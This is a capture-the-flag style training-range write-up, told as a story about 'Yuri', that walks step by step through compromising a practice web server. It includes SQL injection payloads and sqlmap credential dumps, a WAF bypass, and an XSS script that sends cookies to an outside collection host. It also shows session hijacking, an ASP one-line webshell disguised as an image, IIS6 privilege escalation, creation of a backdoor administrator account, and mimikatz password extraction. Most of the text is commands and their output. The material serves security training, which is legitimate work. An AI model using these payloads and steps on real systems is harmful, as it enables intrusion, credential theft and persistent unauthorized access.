[Fengshentai-Control the safe shooting range] Yuri's revenge Xiaofang!
- Chapter 1: For the goddess Xiaofang! SQL injection attack principle practical exercise
- Chapter 2: Encountering obstacles! Bypass WAF filtering! SQL injection attack principle practical exercise
- Chapter 3: This background can identify the login
- Chapter 3: Blasting administrator account login to the background burp to payment and Blasting actual combat drill
- Chapter 4: For more permissions! message board! Practical drill on cookie forgery target permissions
- Chapter 5: Attack! Get the highest authority on the Web! Bypass protection and upload Trojan horse combat drill
- Chapter 6: SYSTEM! POWER! Webshell control target actual combat exercise
- Chapter 7: GET THE PASS! Grasp the administrator's clear text password during the process
Chapter 1: For the goddess Xiaofang! SQL injection attack principle practical exercise
1. Determine whether there is a SQL injection vulnerability
?id=1’
Not displayed normally
?id=1 and 1=1
?id=1 and 1=2
The page echo is abnormal, there is int type injection
Second, determine the number of fields
?id=1 and 1=1 order by 1
?id=1 and 1=1 order by 2
?id=1 and 1=1 order by 3
?id=1 order by 1
?id=1 order by 2
?id=1 order by 3
3 Echo error, the number of fields is 2
Three, judge the echo point
?id=1 and 1=2 union select 1,2
Four, formal injection
?id=1 and 1=2 union select 1,version()
5.5.53
?id=1 and 1=2 union select 1,database()
maoshe
database
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
admin
查字段
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1
Id
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
username
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
password
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 3,1
None, it is found that there are id username password three fields in the admin table
Check field content
?id=1 and 1=2 union select 1,username from admin limit 0,1
admin
?id=1 and 1=2 union select 1,username from admin limit 1,1
ppt receive WeChat
?id=1 and 1=2 union select 1,password from admin limit 0,1
hellohack
this is the flag
?id=1 and 1=2 union select 1,password from admin limit 1,1
zkaqbanban
Two users to two passwords
Be intuitive
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,dirs,news,xss
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
Id,username,password
?id=1 and 1=2 union select 1,
group_concat(id,username,password) from admin
1adminhellohack, 2ppt to receive WeChat zkaqbanban
?id=1 and 1=2 union select 1,
group_concat(id,0x40,username,0x3a,password) from admin
1@admin:hellohack, 2@ppt receive WeChat: zkaqbanban
It's actually over here
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='dirs'
paths
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='news'
id,content
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='xss'
id,user,pass
Five, sql automatic injection
playload:
python sqlmap.py http://59.63.200.79:8003/?id=1
python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
Complete process:
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1
___
__H__
___ ___[']_____ ___ ___ {1.4.8.10#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:18:23 /2020-08-16/
[17:18:26] [INFO] resuming back-end DBMS 'mysql'
[17:18:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:18:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:18:26] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:18:26 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.4.8.10#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:21:36 /2020-08-16/
[17:21:36] [INFO] resuming back-end DBMS 'mysql'
[17:21:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:37] [INFO] fetching database names
[17:21:37] [INFO] fetching number of databases
[17:21:37] [INFO] resumed: 3
[17:21:37] [INFO] resumed: information_schema
[17:21:37] [INFO] resumed: maoshe
[17:21:37] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] maoshe
[*] test
[17:21:37] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:37 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
___
__H__
___ ___[)]_____ ___ ___ {1.4.8.10#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:21:55 /2020-08-16/
[17:21:55] [INFO] resuming back-end DBMS 'mysql'
[17:21:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:56] [INFO] fetching tables for database: 'maoshe'
[17:21:56] [INFO] fetching number of tables for database 'maoshe'
[17:21:56] [INFO] resumed: 4
[17:21:56] [INFO] resumed: admin
[17:21:56] [INFO] resumed: dirs
[17:21:56] [INFO] resumed: news
[17:21:56] [INFO] resumed: xss
Database: maoshe
[4 tables]
+-------+
| admin |
| dirs |
| news |
| xss |
+-------+
[17:21:56] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:56 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
___
__H__
___ ___[(]_____ ___ ___ {1.4.8.10#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:22:39 /2020-08-16/
[17:22:39] [INFO] resuming back-end DBMS 'mysql'
[17:22:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:22:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:22:39] [INFO] fetching columns for table 'admin' in database 'maoshe'
[17:22:39] [INFO] resumed: 3
[17:22:39] [INFO] resumed: Id
[17:22:39] [INFO] resumed: int(11)
[17:22:39] [INFO] resumed: username
[17:22:39] [INFO] resumed: varchar(11)
[17:22:39] [INFO] resumed: password
[17:22:39] [INFO] resumed: varchar(11)
Database: maoshe
Table: admin
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11) |
+----------+-------------+
[17:22:39] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:22:39 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
___
__H__
___ ___[.]_____ ___ ___ {1.4.8.10#dev}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:23:43 /2020-08-16/
[17:23:43] [INFO] resuming back-end DBMS 'mysql'
[17:23:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:23:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:23:43] [INFO] fetching entries of column(s) 'password, username' for table 'admin' in database 'maoshe'
[17:23:43] [INFO] fetching number of column(s) 'password, username' entries for table 'admin' in database 'maoshe'
[17:23:43] [INFO] resumed: 2
[17:23:43] [INFO] resumed: hellohack
[17:23:43] [INFO] resumed: admin
[17:23:43] [INFO] resumed: zkaqbanban
[17:23:43] [INFO] resumed: ppt领取微信
Database: maoshe
Table: admin
[2 entries]
+----------+------------+
| username | password |
+----------+------------+
| admin | hellohack |
| ppt领取微信 | zkaqbanban |
+----------+------------+
[17:23:43] [INFO] table 'maoshe.admin' dumped to CSV file 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79\dump\maoshe\admin.csv'
[17:23:43] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:23:43 /2020-08-16/
Chapter 2: Encountering obstacles! Bypass WAF filtering! SQL injection attack principle practical exercise
?id=171
?id=171 order by 10
//11 (x)
id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
//waf
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
+ Instead of spaces
Echoed 2, 3, 7, 8, 9
The Admin table exists and must be added, otherwise an error will be reported
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
Account admin
password b9a2a2b5dffb918c
password md5 decrypted welcome
Log in to the background/admin
zkz{welcome-control}
Chapter 3: This background can identify the login
-
http://59.63.200.79:8004/admin/default.asp
-
http://59.63.200.79:8004/admin123/
对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。
访问者的Curl(host)为:
http://59.63.200.79:81/admin123/sysadmin_view.asp
访问者的Comeurl(referer)为:
http://59.63.200.79:8004/admin123/
- Important:
Visit admin123/sysadmin_view.asp to
modify host and referer to fake internal access (only the ip and port of Referer are the same as the ip and port of host)
Refresh the page, 4 packages are caught, the last package is what we need
The port numbers are changed to 81
render
zkz{fuzz-666}
Chapter 3: Blasting administrator account login to the background burp to payment and Blasting actual combat drill
http://59.63.200.79:8003/dami_zhifu/dami_baopo/index.php
http://59.63.200.79:8003/dami_zhifu/dami_baopo/admin.php
Common usernames are missing or disabled
Guess the user name zkaq, the correct
bp packet capture blasting password, see the length
The account password is zkaq
flag{s_q_gjrm}
Chapter 4: For more permissions! message board! Practical drill on cookie forgery target permissions
https://xsspt.com/index.php?do=login
<script src = https://xsspt.com/nxqPZY?1597410463> </ script>
cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC;
flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
zkz {xsser-g00d}
Chapter 5: Attack! Get the highest authority on the Web! Bypass protection and upload Trojan horse combat drill
Tips:
1. Log in to the background by modifying Cookie (useless to retype) 2. Upload SHELL! 3. Flag in the root directory of the website (flag.php) 3. It is recommended to upload small files when uploading pictures, I suggest using QQ emoji
Yuri finally got the administrator cookie through XSS, after modifying the cookie, Yuri bypassed the login directly Password,
see the background function! Then all you have to do is to find an upload point and upload your own shell!
Before bp captures cookies, it's OK
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
Put cookie
Chrome
Firefox
Click are you ready
Microsoft-IIS/6.0
There may be IIS parsing vulnerabilities:
- Directory analysis files in the folder named *.asp will be executed as ASP files.
- File parsing For *.asp;.jpg, the malformed file name after ";" is directly ignored, that is to say, it will be executed as *.asp file.
- In addition to asp, the default executable file of IIS6.0 also contains these three types *.asa *.cer *.cdx
View upload directory, and upload file limit
Confirm upload directory
The same is true in other places, the prompt did not fill in the description
Upload point correctly
asp.php
<%eval request ("a")%>
Make a picture horse
copy 1.php + 1.png 2.png
It doesn't seem to work if it's too big. I used this small emoji and changed the file name to 1.cer. Is
n't it cute ? ? ?
Modify the file name to 1.cer upload
It was very difficult. At the beginning, I looked for where the uploaded file was and what the name of the file was. I couldn’t upload it all night, I didn’t upload anything at first, and then I couldn’t upload the pictures I made.
Redo a new one and upload successfully
The upload name copied is the one that takes you to upload the real time
zkz{G3t_the_admin!Sh3ll}
Chapter 6: SYSTEM! POWER! Webshell control target actual combat exercise
Tips:
1. Raise the right!
2. FLAG is in the root directory of Disk C!
Yuri laughed, simple Win2003, as long as he gets SYSTEM permissions, he can show off his skills to the goddess Xiaofang...
Portal
C
Ant Sword's virtual terminal was unsuccessful and refused to access
Changed the genuine kitchen knife, choose asp, GB2312
Command that just appeared on connection
netstat -an | find "ESTABLISHED"
One up whoami
System error 5 has occurred.
access denied.
Virtual terminal without authorization
whoami
nt authority\network service
The next thing to do is
net user username password /add
Not enough permissions at this time
Because cmd needs to use the external interface wscript.shell.
But wscript.shell is on the C drive, and we still cannot access the C drive. Use the assembled wscript.shell, which is iis6.exe.
Privilege escalation order process
iis6.exe "whoami"
//this exploit gives you a local system shell 给了system的命令行权限
iis6.exe "whoami"
//再次确认身份和权限
iis6.exe "net user 1 1 /add"
//添加的用户 (账户1 密码1) 其实是在普通用户组中
iis6.exe "net user 1"
//查看用户信息
iis6.exe "net localgroup Administrators 1 /add"
//添加用户到管理员组
tasklist -svc //找到远程桌面服务termservice 即 svchost.exe 2444 TermService 的PID
netstat -ano //通过上面的PID找到端口号
Use the Windows built-in remote desktop connection to access the host and bring the port number: ip+port.
Remote Desktop is a program that occupies a port number. This port number is actually the port number of the service software. ip represents the server computer. If you want to connect to the remote desktop service on the server, you must change the port number to the port number it occupies.
You can connect directly to win+r
mstsc /v:IP:PORT
Or traditional method
Make a mistake, come again
In fact, you can upload files here
Open my mind from the recycle bin in the lower right corner
Chapter 7: GET THE PASS! Grasp the administrator's clear text password during the process
After getting SYSTEM, Yuri was not satisfied. He was going to get the server administrator password in some way to collect password information for infiltration in other directions. By the way, he wanted to send the password to Xiaofang to show off his skills.
But never thought, when Yuri saw the clear text password of the system. . Surprised. . . Since then, Yuri's life has opened a new chapter
Right-click the file properties, security, advanced, there are 5 lines, select the two lines rejected, edit, clear all
Password acquisition tool mimikatz, search directly
privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码
Right escalation
privilege::debug
Get login user password
sekurlsa::logonPasswords
The system seems to be changed?
Unzip the package password! ! !
(I did it for a long time)
wow!yougotit!
zkz{F3ck_power_3y3stem}
Specific implementation process
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[Try 2 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "net user 1 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net localgroup Administrators 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net localgroup Administrators 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[Try 2 time...]
[Try 3 time...]
[Try 4 time...]
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> tasklist -svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 284 暂缺
csrss.exe 332 暂缺
winlogon.exe 356 暂缺
services.exe 404 Eventlog, PlugPlay
lsass.exe 416 HTTPFilter, PolicyAgent, ProtectedStorage,
SamSs
svchost.exe 608 DcomLaunch
svchost.exe 672 RpcSs
svchost.exe 728 Dhcp, Dnscache
svchost.exe 756 LmHosts, W32Time
svchost.exe 792 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Schedule,
seclogon, SENS, ShellHWDetection, TrkWks,
winmgmt, wuauserv, WZCSVC
spoolsv.exe 952 Spooler
msdtc.exe 980 MSDTC
httpd.exe 1112 Apache2a
svchost.exe 1144 ERSvc
inetinfo.exe 1200 IISADMIN
mysqld.exe 1256 MySQLa
svchost.exe 1960 RemoteRegistry
VGAuthService.exe 2020 VGAuthService
vmtoolsd.exe 2064 VMTools
svchost.exe 2324 W3SVC
svchost.exe 2444 TermService
dllhost.exe 2524 COMSysApp
w3wp.exe 2900 暂缺
wmiprvse.exe 3388 暂缺
logon.scr 3256 暂缺
httpd.exe 852 暂缺
wmiprvse.exe 876 暂缺
cmd.exe 1756 暂缺
tasklist.exe 1744 暂缺
D:\05\UploadFiles\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1112
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:82 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 416
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 980
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1256
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2444
TCP 0.0.0.0:8021 0.0.0.0:0 LISTENING 1112
TCP 127.0.0.1:3306 127.0.0.1:4274 TIME_WAIT 0
TCP 192.168.0.3:82 112.32.5.107:31515 ESTABLISHED 4
TCP 192.168.0.3:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 416
UDP 0.0.0.0:1333 *:* 728
UDP 0.0.0.0:4500 *:* 416
UDP 127.0.0.1:123 *:* 756
UDP 192.168.0.3:123 *:* 756
UDP 192.168.0.3:137 *:* 4
UDP 192.168.0.3:138 *:* 4